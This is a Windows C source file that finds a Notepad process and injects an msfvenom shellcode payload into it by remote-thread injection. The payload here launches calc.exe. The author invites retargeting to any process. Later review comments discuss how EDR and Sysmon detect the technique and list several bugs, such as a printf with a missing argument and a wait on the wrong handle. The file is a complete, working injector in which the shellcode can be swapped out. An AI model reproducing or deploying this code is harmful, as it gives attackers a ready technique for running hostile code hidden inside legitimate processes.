#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
// File-scope state used only by main(); nothing else in the file reads these,
// so they could equally be locals (style note, no behavior impact).
// Receives the previous page protection reported by VirtualProtectEx.
DWORD oldprotect = 0;
// Thread id written back by CreateRemoteThread; not initialized before that call.
DWORD TID;
// Id of the target process; stays 0 if the snapshot walk in main() finds no match.
DWORD PID = 0;
unsigned char poop[] =
/* Shellcode of calc.exe generated using msfvenom */
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
/*
 * Entry point: locates a process by image name via a Toolhelp snapshot, then
 * allocates, writes, re-protects and executes a buffer in it with a remote thread.
 * The API sequence used here (OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx ->
 * WriteProcessMemory -> VirtualProtectEx -> CreateRemoteThread) is the classic
 * remote-thread injection pattern; it is the kind of cross-process activity that
 * Sysmon Event ID 8 (CreateRemoteThread) and EDR kernel callbacks are built to
 * surface, and the RW-then-RX protection change is itself a common telemetry signal.
 * Returns EXIT_SUCCESS, or EXIT_FAILURE after printing the failing step.
 */
int main() {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot == INVALID_HANDLE_VALUE) {
// BUG: the format string has a %ld conversion but no argument is passed, which is
// undefined behavior (a missing vararg is read). Every other failure message in
// this function passes GetLastError(); this one was presumably meant to as well.
printf("[!] Failed to create a snapshot. Exiting with error: %ld\n");
// In this branch snapshot == INVALID_HANDLE_VALUE, so this CloseHandle call
// operates on a sentinel rather than a real handle; it is not a useful cleanup.
CloseHandle(snapshot);
return EXIT_FAILURE;
}
printf("[+] Successfully got the snapshot\n");
PROCESSENTRY32 pe32;
// Only dwSize is initialized; Toolhelp requires it to be set before Process32First.
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snapshot, &pe32) == TRUE) {
// NOTE(review): the entry filled in by Process32First is never compared — the loop
// calls Process32Next before the first szExeFile check, so the first process in
// the snapshot is skipped. Harmless for this target name, but a latent logic slip.
while (Process32Next(snapshot, &pe32) == TRUE) {
//Here I am looking for notepad.exe process, change it to whatever process you want to target and compile :)
// _wcsicmp is case-insensitive, so "notepad.exe" and "Notepad.exe" both match;
// szExeFile is the image name only, not a path, and wide because of _wcsicmp/L"".
if (_wcsicmp(pe32.szExeFile, L"Notepad.exe") == 0) {
CloseHandle(snapshot);
PID = pe32.th32ProcessID;
break;
}
}
}
// NOTE(review): the snapshot handle is closed only on the match path above. When no
// process matches (or Process32First fails) it is never closed, and PID is still
// 0 from its initializer, so the OpenProcess below is issued for PID 0. A check
// such as `if (PID == 0) { CloseHandle(snapshot); return EXIT_FAILURE; }` would
// make the "not found" case explicit instead of relying on OpenProcess to fail.
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
if (hProcess == NULL) {
printf("[!] Failed to open process. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Opened the process successfully.\n");
// Region is reserved and committed as RW first; it is flipped to RX below so the
// buffer is never writable and executable at the same time.
LPVOID virtualmem = VirtualAllocEx(hProcess, NULL, sizeof(poop), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
if (virtualmem == NULL) {
printf("[!] Failed to allocate memory. Exiting with error: %ld\n", GetLastError());
// NOTE(review): hProcess is not closed on this or the following early returns;
// process exit reclaims it, but it is inconsistent with the cleanup at the end.
return EXIT_FAILURE;
}
printf("[+] Memory allocation successful.\n\t\\----0x%p\n", virtualmem);
// The NULL last argument discards the bytes-written count, so a partial write
// would only be caught if the call reports outright failure.
BOOL writemem = WriteProcessMemory(hProcess, virtualmem, &poop, sizeof(poop), NULL);
if (writemem == 0) {
printf("[!] Failed to write memory. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Memory written successfuly.\n");
// Previous protection is stored in the file-scope oldprotect; it is never restored.
BOOL changemem = VirtualProtectEx(hProcess, virtualmem, sizeof(poop), PAGE_EXECUTE_READ, &oldprotect);
if (changemem == 0) {
printf("[!] Failed to change the memory protection rights. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Changed the memory protection from read,write to execute,read\n");
// Thread entry is the remote buffer itself; the thread id lands in the global TID.
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)virtualmem, NULL, 0, &TID);
if (hThread == NULL) {
printf("[!] Failed to create a thread. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Successfully created remote thread\n");
// NOTE(review): this waits on the *process* object, which is signaled when the
// target process exits, not on hThread created just above. If the intent was to
// wait for the injected thread to finish, `WaitForSingleObject(hThread, INFINITE);`
// is the handle to use; as written, the program blocks until the target closes.
WaitForSingleObject(hProcess, INFINITE);
printf("[*] Cleaning up...\n");
CloseHandle(hProcess);
CloseHandle(hThread);
return EXIT_SUCCESS;
}